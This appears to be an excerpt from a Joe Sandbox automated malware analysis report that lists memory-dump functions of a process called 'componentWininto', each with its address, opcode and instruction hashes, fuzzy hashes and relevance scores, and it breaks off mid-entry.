                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba58c7888b9bf66b559659bb8b0b99cef48f033b920979264af17f47cc940ac0
                                                  • Instruction ID: 19c73d528b911a6295b10102ce579393250bc3fccb2461171c056109748e0026
                                                  • Opcode Fuzzy Hash: ba58c7888b9bf66b559659bb8b0b99cef48f033b920979264af17f47cc940ac0
                                                  • Instruction Fuzzy Hash: E5612230A1E56A8BEB2D8F58C4F05B13BA1FF4532071495BDD44B8B59BCA28F941CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBC24D Relevance: .2, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef835e68cb094fdac1c60c8c1751a171dec839e221d6e7999cbd38d9452841ed
                                                  • Instruction ID: 7d870a93136a38393d75a718be9fb3502e260ecccc1f3bdfa3aa65f1208fcbd2
                                                  • Opcode Fuzzy Hash: ef835e68cb094fdac1c60c8c1751a171dec839e221d6e7999cbd38d9452841ed
                                                  • Instruction Fuzzy Hash: D261AD30609B1A8FE368CB58D1A46B177E1FF44320B95197DC48FC7AA2DA29F942CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF345A Relevance: .2, Instructions: 178COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49121f84942c9e6375e281272c65efecf102d67f4b71ee4f0bda4f9ff246ab0d
                                                  • Instruction ID: 6d46fce4f17e0cc09cac31e9060792d3f08c0dbdcdc777cc9a699720790b1e81
                                                  • Opcode Fuzzy Hash: 49121f84942c9e6375e281272c65efecf102d67f4b71ee4f0bda4f9ff246ab0d
                                                  • Instruction Fuzzy Hash: 4061DF30B1A68A8BEB2DCF48D4A45B17BA1FF41301B1545BDC48B8B59BCA6CF541CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9BB8 Relevance: .2, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5bec335c4608961895776509d77eaaf2610da9a97bcc9fa2cd0b35441d22fd58
                                                  • Instruction ID: d3441efe12eab444a7a1de02e2e8c8b5eb36b71b0ce20bdf9914172fb1b930c6
                                                  • Opcode Fuzzy Hash: 5bec335c4608961895776509d77eaaf2610da9a97bcc9fa2cd0b35441d22fd58
                                                  • Instruction Fuzzy Hash: 23414631B1DA5E4BF33D8A6CD86257537D1EF85320F16123ED88FC32E6DD28A9428651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD1CFD Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e25b1677f9089257c65175048ba4b403036fc41698097db2a9df137c077a383
                                                  • Instruction ID: d6260f79026f13f2a1ed859e076cae0ee6162bde9f004648ada0dff7253d6bc1
                                                  • Opcode Fuzzy Hash: 7e25b1677f9089257c65175048ba4b403036fc41698097db2a9df137c077a383
                                                  • Instruction Fuzzy Hash: D751D230B18A894FDB5CDF5888655BA77E2FFE8300B15467EE49EC7295DE34A8028781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE28C1 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6f72bd8ae65d6b9549a5c5e10b34a72a98e4ca17abaf452c4efcbe4c3782dff
                                                  • Instruction ID: 09b31b07095ddef7ca0d6020939f759acd90dfcac0bffa125f21effe57692f79
                                                  • Opcode Fuzzy Hash: e6f72bd8ae65d6b9549a5c5e10b34a72a98e4ca17abaf452c4efcbe4c3782dff
                                                  • Instruction Fuzzy Hash: 4151C970E1961D8FDBA4EBA4C8647ADB7B1FF59300F5141BAC10DE32A1DE786A85CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF4988 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6d3996127ffc7efc6f17ef49cbabf5dac1adeb4e80dd737c8d27dc11ed893e1
                                                  • Instruction ID: 06ebca2cb5d423668f41400d5f7aa9fdfe502b69fa77c5f75d4ea5cb6a7be0f0
                                                  • Opcode Fuzzy Hash: e6d3996127ffc7efc6f17ef49cbabf5dac1adeb4e80dd737c8d27dc11ed893e1
                                                  • Instruction Fuzzy Hash: E151F53160CA484FEB68EF18C495DB4B7E1EB69315714057DE49EC31A3DD24F985CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB4668 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62068325ad2be29b0a0843d91a2f5c0cd7185b25a57ce7662c53169f25ea0007
                                                  • Instruction ID: 9e6b6b409ebb136fd895e4de58b15b4a82ae6e2a98b0b763d21a1c35da0cc103
                                                  • Opcode Fuzzy Hash: 62068325ad2be29b0a0843d91a2f5c0cd7185b25a57ce7662c53169f25ea0007
                                                  • Instruction Fuzzy Hash: 46510C32A0E55A5FD768E7ACDC708E93B60EF15329B0502BBE05E8B1E3DD186505CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7AFF Relevance: .2, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44934d522a09559429b3463a3217cb8498612af9d6dec86a03b11e32f894b916
                                                  • Instruction ID: c894793d26f51a48925cecfa23125c78fb3daf294d23ee21f814ab23e2664785
                                                  • Opcode Fuzzy Hash: 44934d522a09559429b3463a3217cb8498612af9d6dec86a03b11e32f894b916
                                                  • Instruction Fuzzy Hash: 2B51F330A1E56A8BEB2D8F58C4F15717BA1EF4532071455FDD44B8B29BCA28F941CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB5025 Relevance: .2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b197eac838d4474fdef442def2ee1f13e6ded0fad55f0d06da06126547a3c8c
                                                  • Instruction ID: 38984e42ebe30e5cd8ba500aaa18e83c57eaa2bd0ee0d42a023f5908fb3e0b63
                                                  • Opcode Fuzzy Hash: 9b197eac838d4474fdef442def2ee1f13e6ded0fad55f0d06da06126547a3c8c
                                                  • Instruction Fuzzy Hash: 72516071A1A56E8FEBACDB548871AF877A0EF58314F1501BDD00ED72A1DE386A808F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6709 Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ebadea02aebc91731389c016345dbbf02bfce8f133b8dc8201cf5c9f93c015c
                                                  • Instruction ID: 2b7db871f4709960bb3fe7a42734303730bbae3363992558a18350a5098ec9b7
                                                  • Opcode Fuzzy Hash: 7ebadea02aebc91731389c016345dbbf02bfce8f133b8dc8201cf5c9f93c015c
                                                  • Instruction Fuzzy Hash: D741A331B1E52E8FE77C9698943497DB7E0EF48720B1610B6E00FC75B5DE18EA004B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB3749 Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b1e114e34e5d5c144a4f55dfbfe64f4132745b6e981e50ac222d2570cdf2daa
                                                  • Instruction ID: 5ea4d784e2e834cd4331b21732be3eee479c1a30bebd0885dc03793bc90e8e0d
                                                  • Opcode Fuzzy Hash: 3b1e114e34e5d5c144a4f55dfbfe64f4132745b6e981e50ac222d2570cdf2daa
                                                  • Instruction Fuzzy Hash: FA41D471A0E65E8FEB68DF54C8216B93BB0FF15320F11107BE41AC72E1DA25A904DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB35F2 Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 202d147d374a6b50793f869baf45a4a8d662e013ef1b90e27cc7336642742d0f
                                                  • Instruction ID: 476629ca9067dcbeaafbd939ffc248fcc4f823ae3da2bd342af69992ba9fe7f8
                                                  • Opcode Fuzzy Hash: 202d147d374a6b50793f869baf45a4a8d662e013ef1b90e27cc7336642742d0f
                                                  • Instruction Fuzzy Hash: C3410D67A0F6D90FD726A7AC5C754E93FA09F16339B0902FBE0898F1E3E8082549C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD3145 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2eeb1127f0d17563a4ddbdae28db74c148657471246449c892b7eeb6f8458db4
                                                  • Instruction ID: f4eea5536f13c1d3ae3a45a93c54f99e703a6a5c25da3d4b1a819fa4bb55621a
                                                  • Opcode Fuzzy Hash: 2eeb1127f0d17563a4ddbdae28db74c148657471246449c892b7eeb6f8458db4
                                                  • Instruction Fuzzy Hash: 95512E70E0A60E8FEB64DB98C4646ED77F1FF98310F51427AD409E72A5DA786A44CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADAD7D Relevance: .1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b89724ab0301fc34074c2f92f0a72922074304e1ed724cdb473f05d6b7a1de3c
                                                  • Instruction ID: f5e4aab2900736c79b56e134e0e2622d5059ae759550c4089a596b8edd60c02f
                                                  • Opcode Fuzzy Hash: b89724ab0301fc34074c2f92f0a72922074304e1ed724cdb473f05d6b7a1de3c
                                                  • Instruction Fuzzy Hash: D5414E61F0FA9E5FE7219BB4C4691E87BE0FFA5350B0946BEC198C70A3EE646505C341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE7C11 Relevance: .1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb3040f370ac53046b80124c36daa38b9ccdcfed07300b58c7a12ce5fd8cabaf
                                                  • Instruction ID: 727fba1a672445d65957c7576907cbd4e8f501d9cfd8a66ae01a6674843e3f5d
                                                  • Opcode Fuzzy Hash: fb3040f370ac53046b80124c36daa38b9ccdcfed07300b58c7a12ce5fd8cabaf
                                                  • Instruction Fuzzy Hash: F8519131E0A60E8BEB68DFA4C4686BE77A1FF45304F11457AC009E72E1DE786E41CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF495E Relevance: .1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59f70fe23d39ee4e981f209acf723ce2ec82744ab7cdd4a0b63752458d424dd3
                                                  • Instruction ID: 501db5843ccf3ac86648622bebf149c063e4e63b8c9f0eb5de17b25ec5160c5b
                                                  • Opcode Fuzzy Hash: 59f70fe23d39ee4e981f209acf723ce2ec82744ab7cdd4a0b63752458d424dd3
                                                  • Instruction Fuzzy Hash: 7241A43160CA498FDB68EF18C4A5DA5BBE0FF69314B0406ADE45EC71A2DE24F984CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD2115 Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e412d2390f4ac2f2ff2bef315830a7b488986b4a21536ee725846df35f28708
                                                  • Instruction ID: db70655290f3448918ab53ee895b079cf2289f18bbfae4ff7f5e08c971f19ba5
                                                  • Opcode Fuzzy Hash: 3e412d2390f4ac2f2ff2bef315830a7b488986b4a21536ee725846df35f28708
                                                  • Instruction Fuzzy Hash: 75412532B0E64A4FE765DBB8C4655B87BE0EFC6310B0642BBF45CC71A6DE68A9418341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF4C55 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1295bfb01c9bf2169108c047157ae84fa7a99b0651a433462fcd40e9053bb9a8
                                                  • Instruction ID: 1c87b0d3f37b4c9566ac6ef14d6680365966ca4b5738cfdfa5819566a6f50cb1
                                                  • Opcode Fuzzy Hash: 1295bfb01c9bf2169108c047157ae84fa7a99b0651a433462fcd40e9053bb9a8
                                                  • Instruction Fuzzy Hash: 19411721B0DD0E4FE7A8EB298464AB837D2EF9834475541BDD00EC72FADE29AD428341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADBC49 Relevance: .1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de2429abd72c2b33fef0894ec4851f5347ee8d7c29f32e99c3542571cc606c19
                                                  • Instruction ID: 761a349c34fe3864dd6a005539a219e68d0b837e7ab5ebd81bf8e647f7ea811c
                                                  • Opcode Fuzzy Hash: de2429abd72c2b33fef0894ec4851f5347ee8d7c29f32e99c3542571cc606c19
                                                  • Instruction Fuzzy Hash: 1F511C70E0A60D8FDB68DFA4C4A46ED7BF1BF58301F51013AD449EB2A1DB78AA44CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD364E Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 119bd5136a9d05250ef1a3e172e1f2234261af0adee0f6b5aa48b0229bda0dba
                                                  • Instruction ID: fd377b2991441787624088867b5e2e51977c647f9b8baf2c11a5d1bb5e1a57a4
                                                  • Opcode Fuzzy Hash: 119bd5136a9d05250ef1a3e172e1f2234261af0adee0f6b5aa48b0229bda0dba
                                                  • Instruction Fuzzy Hash: BA419071A1D90E8FE758DF5888697A87BE1FB99358F9043BED008C72DACBB424018B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE1A0C Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7e7f85718ac9c72d7a5aeda498e524d8f018a1adddb8c6785944fe2ebc9bc99
                                                  • Instruction ID: 994f2557af612b1e92e34ad4fa56a1da9dadd4ce51a0bb191ef7e3034f22c41a
                                                  • Opcode Fuzzy Hash: b7e7f85718ac9c72d7a5aeda498e524d8f018a1adddb8c6785944fe2ebc9bc99
                                                  • Instruction Fuzzy Hash: F541903054E3D94FCB43DBB888745E67FF0AF17200B0A45EBD484CB0A3D6646A59C752
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBEE57 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85d3ecb0fbe2093f17d2e19eea6e569ca736884399079021d4696c4e0284223e
                                                  • Instruction ID: 09c034fd21a06b7cbe1d28afbc609b066a47f002584eb6eb78d5362a6b182199
                                                  • Opcode Fuzzy Hash: 85d3ecb0fbe2093f17d2e19eea6e569ca736884399079021d4696c4e0284223e
                                                  • Instruction Fuzzy Hash: D0314E31B1E79A4FE3BD4668582543577E4EF4A320F11147EE48FC75A3DA18B9028B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEAE69 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c51d237e25ee313488cc9c49c129590f9abe87756b5f5741c028c4ded843586
                                                  • Instruction ID: 887c2dda3c03a5132e409e7ce1b3a765bb41863c3269d263b00c8224f5cf5cd3
                                                  • Opcode Fuzzy Hash: 0c51d237e25ee313488cc9c49c129590f9abe87756b5f5741c028c4ded843586
                                                  • Instruction Fuzzy Hash: D6413C71E1990D8FDBA8DF98C4A4AADBBB1FF58300F110179D00FEB2A5DA74A945CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB1C20 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 493e4a743b78231cbe44c4184090aea57fae9d7266316620e775b132151a1425
                                                  • Instruction ID: 36de480226c9959d5c909e08fe12da52ba92a62e4c1d298b149d6ddbfabaa772
                                                  • Opcode Fuzzy Hash: 493e4a743b78231cbe44c4184090aea57fae9d7266316620e775b132151a1425
                                                  • Instruction Fuzzy Hash: 04410634A2D56E8EEB7C875A84706F8B7A1FF54310F1541B9D04FC71A6DD387A818B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB2546 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 691886c3be59fe4aaf9795deba681c6930d70fae35d428e27b83e90a8f153af1
                                                  • Instruction ID: d66cb00de26e042ed0f82927d4415b4fe6a34ca5b9648742251d3da4be55567f
                                                  • Opcode Fuzzy Hash: 691886c3be59fe4aaf9795deba681c6930d70fae35d428e27b83e90a8f153af1
                                                  • Instruction Fuzzy Hash: 34517E3171AB1A8FE368CB94D1A4A627BE1BF54314B51593DC48FC3EA6DB39B941CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBB8B0 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eafe8f4a6b064765fdaf73ee181e11cdeb2a1c75588c2dd58e7472ed82d349e2
                                                  • Instruction ID: 20aec11162cae5838c1aba24884ec77b14d8cb8128775aede99fbfbc20a80d63
                                                  • Opcode Fuzzy Hash: eafe8f4a6b064765fdaf73ee181e11cdeb2a1c75588c2dd58e7472ed82d349e2
                                                  • Instruction Fuzzy Hash: 8C412630E1D5AE8FEB6CCBA884756F877A1FF54310F15017AC05FC71A6C928AA80CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7E90 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e7854148fa575ed40b21dce99a49e13b8f2ced8f3c05c308bb07ae277af636d
                                                  • Instruction ID: cd4e1460ee3bc71b7aa40539c8c66c019eb229a4b49aab0c3426b6a755a3f314
                                                  • Opcode Fuzzy Hash: 1e7854148fa575ed40b21dce99a49e13b8f2ced8f3c05c308bb07ae277af636d
                                                  • Instruction Fuzzy Hash: 6B41B430E1E56E8FEB7C8A5884B16B877A1FF58310F1551B9D04FC7196DD386A81CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9167 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce0f93267608d1c9a0b7f0c04e30407d12ac0e5c118468f790abe27d4b14a89b
                                                  • Instruction ID: 62c713f99bfe34cef52a15e480901c7282c89d03a84f063cc1af1e31395de0a3
                                                  • Opcode Fuzzy Hash: ce0f93267608d1c9a0b7f0c04e30407d12ac0e5c118468f790abe27d4b14a89b
